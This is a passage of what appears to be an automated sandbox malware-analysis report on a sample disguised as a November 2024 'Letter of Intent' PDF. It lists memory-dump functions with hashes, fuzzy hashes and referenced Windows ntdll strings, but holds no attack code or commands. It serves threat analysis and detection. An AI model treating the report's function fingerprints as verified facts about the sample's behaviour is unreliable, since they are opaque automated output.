                                                                                      • Opcode ID: ba3a81406d764f539d3c404085fe67fd034c1a145976c69bd5a55214d1b22253
                                                                                      • Instruction ID: ea12d3ea38dd5c434db53f3290902c460754f33ec98576a2c28f10db151b4ddd
                                                                                      • Opcode Fuzzy Hash: ba3a81406d764f539d3c404085fe67fd034c1a145976c69bd5a55214d1b22253
                                                                                      • Instruction Fuzzy Hash: FB91AEB6A04349DFEB15CF54C550BEE77B0EF01758F144999EA10AB3A0DB79AA80CF90
                                                                                      Function 32FC909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: %$&$@
                                                                                      • API String ID: 0-1537733988
                                                                                      • Opcode ID: 9c2f76ad9f296a7b43c7eb5469ddeb93eb322bc6bf6908f202448fd835999bd9
                                                                                      • Instruction ID: 0baaadc0b8445eeea1425d0182b764a7e068a75ef95b0454102a2d36a1d4cc93
                                                                                      • Opcode Fuzzy Hash: 9c2f76ad9f296a7b43c7eb5469ddeb93eb322bc6bf6908f202448fd835999bd9
                                                                                      • Instruction Fuzzy Hash: 0C71B0746083129FE304CF24C580A6BBBE9BF84758F108D5DE6E687290DB71D905CF92
                                                                                      Function 3306B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • GlobalizationUserSettings, xrefs: 3306B834
                                                                                      • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3306B82A
                                                                                      • TargetNtPath, xrefs: 3306B82F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                      • API String ID: 0-505981995
                                                                                      • Opcode ID: db571936fc51eaa77fa0454d38cf8185b3beb4f4819f06c67ba49152ed4ec176
                                                                                      • Instruction ID: b95fd7706aed7dd935f78182c0d2876d1fe61af08abdf6d888bd30b4fe109e3c
                                                                                      • Opcode Fuzzy Hash: db571936fc51eaa77fa0454d38cf8185b3beb4f4819f06c67ba49152ed4ec176
                                                                                      • Instruction Fuzzy Hash: D8619FB2D41229ABDB21DF55DC88BDAB7F8EF04718F4105E9E508A7250CB749E84CFA0
                                                                                      Function 32F8F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 32FEE6C6
                                                                                      • HEAP[%wZ]: , xrefs: 32FEE6A6
                                                                                      • HEAP: , xrefs: 32FEE6B3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                      • API String ID: 0-1340214556
                                                                                      • Opcode ID: 4d1e8086bde0805d12ce12cade2a10bf21d9a44468a666e3ac486558847c2394
                                                                                      • Instruction ID: 36744d66c994545e14426486cb5524c541e8fe5cc67edce5045a4ba983fb9e67
                                                                                      • Opcode Fuzzy Hash: 4d1e8086bde0805d12ce12cade2a10bf21d9a44468a666e3ac486558847c2394
                                                                                      • Instruction Fuzzy Hash: 2551F275600784EFE312CBA4D854F9AFBF8EF05358F1009A0EA81CB692DB74E900CB60
                                                                                      Function 32FB15F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 32FFA59A
                                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 32FFA589
                                                                                      • LdrpCompleteMapModule, xrefs: 32FFA590
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                      • API String ID: 0-1676968949
                                                                                      • Opcode ID: 4c3b5054f3964416cbbca1e2174846c9e88d9333d31ee4b7c55b05b0e9ae03ea
                                                                                      • Instruction ID: 3146e6d052b3772568debd6ac12bc62e8a10b1a4f075dadae9da3a3b52a84217
                                                                                      • Opcode Fuzzy Hash: 4c3b5054f3964416cbbca1e2174846c9e88d9333d31ee4b7c55b05b0e9ae03ea
                                                                                      • Instruction Fuzzy Hash: 0D51F1B9700749ABEB11DB69C940B0B77E5AF40B58F180EA5EB529B7E1DB74E800CF40
                                                                                      Function 3303DAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3303DC32
                                                                                      • HEAP[%wZ]: , xrefs: 3303DC12
                                                                                      • HEAP: , xrefs: 3303DC1F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                      • API String ID: 0-3815128232
                                                                                      • Opcode ID: d06e21ede377f807e6809866c87c70ff1d7c8f42dc8d7c88d82974996f6cdb3d
                                                                                      • Instruction ID: 1483ee45defa9bb71bf1e32a1c1634a6603f092428e6f1015c929ccf3031aefd
                                                                                      • Opcode Fuzzy Hash: d06e21ede377f807e6809866c87c70ff1d7c8f42dc8d7c88d82974996f6cdb3d
                                                                                      • Instruction Fuzzy Hash: 0E511179122350CAF360CE2AC840776B3E6EB473A4F444CCAE4E1CB681D676D847DB61
                                                                                      Function 32F8758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                      • API String ID: 0-1151232445
                                                                                      • Opcode ID: d31a2155e0bd5ef829006f17b0d1f79bfc10d6076d736f51cdabed1945c731ab
                                                                                      • Instruction ID: 13b40be8ad109abd48e308e15fbc16dd1da9145686b9c7d195b98bd6946a339c
                                                                                      • Opcode Fuzzy Hash: d31a2155e0bd5ef829006f17b0d1f79bfc10d6076d736f51cdabed1945c731ab
                                                                                      • Instruction Fuzzy Hash: 884106BE3003908FEB16CF18C490769B7D09F41388F544DA9DB468B256DE74D885CF52
                                                                                      Function 32FC16CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 33001B39
                                                                                      • LdrpAllocateTls, xrefs: 33001B40
                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 33001B4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                      • API String ID: 0-4274184382
                                                                                      • Opcode ID: f3b87f96a800b58a21fab390717bec232bcaea8185c60f93ecbf15a5952d82f1
                                                                                      • Instruction ID: 90415f080b9412655118bcfed497b67e394cc03337dc55960473acd5ebf5c1e4
                                                                                      • Opcode Fuzzy Hash: f3b87f96a800b58a21fab390717bec232bcaea8185c60f93ecbf15a5952d82f1
                                                                                      • Instruction Fuzzy Hash: 40417AB9A00619AFEB15DFA8C840AAEBBF6FF48704F104969E505B7210DB74A801CF90
                                                                                      Function 33045180 Relevance: 3.9, Strings: 3, Instructions: 114COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                                                                      • API String ID: 0-964947082
                                                                                      • Opcode ID: 12d068de6b3ba563dced0e336e48a0801dc378ee7d2376d3bc0399ec9020695f
                                                                                      • Instruction ID: a7508b1881a3463ab52ebb12733e0e5b96d597d0f63810b321eca75c17e53742
                                                                                      • Opcode Fuzzy Hash: 12d068de6b3ba563dced0e336e48a0801dc378ee7d2376d3bc0399ec9020695f
                                                                                      • Instruction Fuzzy Hash: A141FFB5A01349AFD701DFA4CA81F6A7BE8EB46344F0544FAEA51AF240CA30DA45CF50
                                                                                      Function 32FC33A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • RtlCreateActivationContext, xrefs: 330029F9
                                                                                      • SXS: %s() passed the empty activation context data, xrefs: 330029FE
                                                                                      • Actx , xrefs: 32FC33AC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                      • API String ID: 0-859632880
                                                                                      • Opcode ID: b54c5728d8e83fa354cce8e2e4896aef6d22ad345f5088e80655b228dc75a243
                                                                                      • Instruction ID: e0f34b801e26e1985053db4ce14c755d5b61f00c987582030495507283ddd75b
                                                                                      • Opcode Fuzzy Hash: b54c5728d8e83fa354cce8e2e4896aef6d22ad345f5088e80655b228dc75a243
                                                                                      • Instruction Fuzzy Hash: 98311032600316DFEB16CF68D8D0F9A77A8EB447A4F5548A9EE04AF285CB74D845CB90
                                                                                      Function 3301B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • @, xrefs: 3301B670
                                                                                      • GlobalFlag, xrefs: 3301B68F
                                                                                      • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3301B632
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                      • API String ID: 0-4192008846
                                                                                      • Opcode ID: 2145429eedebc0c71165419bf90865e7a3b3f990b2fb0fee0194906e0dceb893
                                                                                      • Instruction ID: 0d17f9b451a21060115c2fc24d56126a2ce3f2bc785967e9bffe9ce217a1da10
                                                                                      • Opcode Fuzzy Hash: 2145429eedebc0c71165419bf90865e7a3b3f990b2fb0fee0194906e0dceb893
                                                                                      • Instruction Fuzzy Hash: B1314CB5D00209AFDB00DFA4DC80BEEBBB8EF44744F5408A9E605E7250D7749E04CBA4
                                                                                      Function 330313B9 Relevance: 3.9, Strings: 3, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                                                                      • API String ID: 0-1050206962
                                                                                      • Opcode ID: a8099a8c0090bf8a59cfb918a1d032d1b9f0f92033614cd52e4b6b22573aa1c0
                                                                                      • Instruction ID: 75469bab27bfa77710b55e59b4de3857d1c811172f7033f74f8ace83479ad29d
                                                                                      • Opcode Fuzzy Hash: a8099a8c0090bf8a59cfb918a1d032d1b9f0f92033614cd52e4b6b22573aa1c0
                                                                                      • Instruction Fuzzy Hash: 5B318D72D01219BFEB01EF94CC84EAEBBBDEB49764F4548A5EA00B7610D774DD048BA0
                                                                                      Function 32FC1607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • LdrpInitializeTls, xrefs: 33001A47
                                                                                      • DLL "%wZ" has TLS information at %p, xrefs: 33001A40
                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 33001A51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                      • API String ID: 0-931879808
                                                                                      • Opcode ID: 8a46e6bd9d52601a9f41a7526fbdff59ea93858aeb8984ab162e7bf0d96aa84a
                                                                                      • Instruction ID: f0d7b46b0a358acd7cd0e4b90142c2d43d53c568041abdb3bd56a115c395f677
                                                                                      • Opcode Fuzzy Hash: 8a46e6bd9d52601a9f41a7526fbdff59ea93858aeb8984ab162e7bf0d96aa84a
                                                                                      • Instruction Fuzzy Hash: 7F31E772A00312AFF714BB98C845F5B77F8AB44B54F0409A9EA00BB190DB70AD159F90
                                                                                      Function 32FD1270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • @, xrefs: 32FD12A5
                                                                                      • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 32FD127B
                                                                                      • BuildLabEx, xrefs: 32FD130F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                      • API String ID: 0-3051831665
                                                                                      • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                      • Instruction ID: 4f937d9f94d2d3813c767defaa78e541c1aa26cf22ba53e03a0f2461ae2d79ea
                                                                                      • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                      • Instruction Fuzzy Hash: A2318172A00619AFEB11AFA5CC40EDFBBBDEB84B50F044825EA14A7160DB70DA05CB90
                                                                                      Function 32F874B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: RtlValidateHeap
                                                                                      • API String ID: 3446177414-1797218451
                                                                                      • Opcode ID: 32149b73577803d9c6c49565666f573797e525136b15858ecd4d507e7ef741e2
                                                                                      • Instruction ID: cc7b837047e418158bd570efab47ea916e450523ec5f0027b0c6ccb5a35b84ab
                                                                                      • Opcode Fuzzy Hash: 32149b73577803d9c6c49565666f573797e525136b15858ecd4d507e7ef741e2
                                                                                      • Instruction Fuzzy Hash: 2341157AB00355DFDB02EF64C4907AEFBB2BF81754F048A98DA526B380CB349901DB90
                                                                                      Function 3303705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: kLsE
                                                                                      • API String ID: 3446177414-3058123920
                                                                                      • Opcode ID: 0b1123bf7eebd2681882b04a4d8a32f23ce3bf1aa5b86426b7e6783b92aa09d5
                                                                                      • Instruction ID: 44b6a9215648a8df5134d25d9e639825782ec78290a62a45f99fa3c2cb2813bb
                                                                                      • Opcode Fuzzy Hash: 0b1123bf7eebd2681882b04a4d8a32f23ce3bf1aa5b86426b7e6783b92aa09d5
                                                                                      • Instruction Fuzzy Hash: A841297290234D87F711AF68C984BAD3BD4AB42B74F1506D9FE90AE1C2CBB44487CB91
                                                                                      Function 32FA52A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@
                                                                                      • API String ID: 0-149943524
                                                                                      • Opcode ID: ef381f3aa33bcd53abdfc42b620fd0ecec6cf4794e6d787ac44121b50d3f4465
                                                                                      • Instruction ID: 61caa4a2ebba87f6392a97957f02617449fae8831fb7a16a898291ebb3dacc48
                                                                                      • Opcode Fuzzy Hash: ef381f3aa33bcd53abdfc42b620fd0ecec6cf4794e6d787ac44121b50d3f4465
                                                                                      • Instruction Fuzzy Hash: C8328DB9A083519BD7248F15C4A0B3EB7F1AF88748F504D1EFA959B2A0EB75C844CF52
                                                                                      Function 32F95702 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: 77d242d62569664775a8af8994449990b012d48042185d0b219504c8b69403d4
                                                                                      • Instruction ID: c20ba85538a2c54106ccee885a268cbbcac0f9a2531ccf92029bd0159e0e2e7b
                                                                                      • Opcode Fuzzy Hash: 77d242d62569664775a8af8994449990b012d48042185d0b219504c8b69403d4
                                                                                      • Instruction Fuzzy Hash: 5631BD35701B0AFBEB559F64CA90BD9FBA5FF44744F000825EA0157A60EBB1E920CBD1
                                                                                      Function 33011ACB Relevance: 2.8, Strings: 2, Instructions: 278COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$AddD
                                                                                      • API String ID: 0-2525844869
                                                                                      • Opcode ID: 9a6292f3ab656c3e524bbb2479fcc563a12035c744050e538f27f97e82a8fc61
                                                                                      • Instruction ID: 73ec669eb2703599e890e8e917fce51c2577be1cb543341aca9da959b0073b74
                                                                                      • Opcode Fuzzy Hash: 9a6292f3ab656c3e524bbb2479fcc563a12035c744050e538f27f97e82a8fc61
                                                                                      • Instruction Fuzzy Hash: 71A18EB5A04300AFE318CF54C885BABB7EDFB84704F544A6EF59587150E7B0E915CBA2
                                                                                      Function 32FAF720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
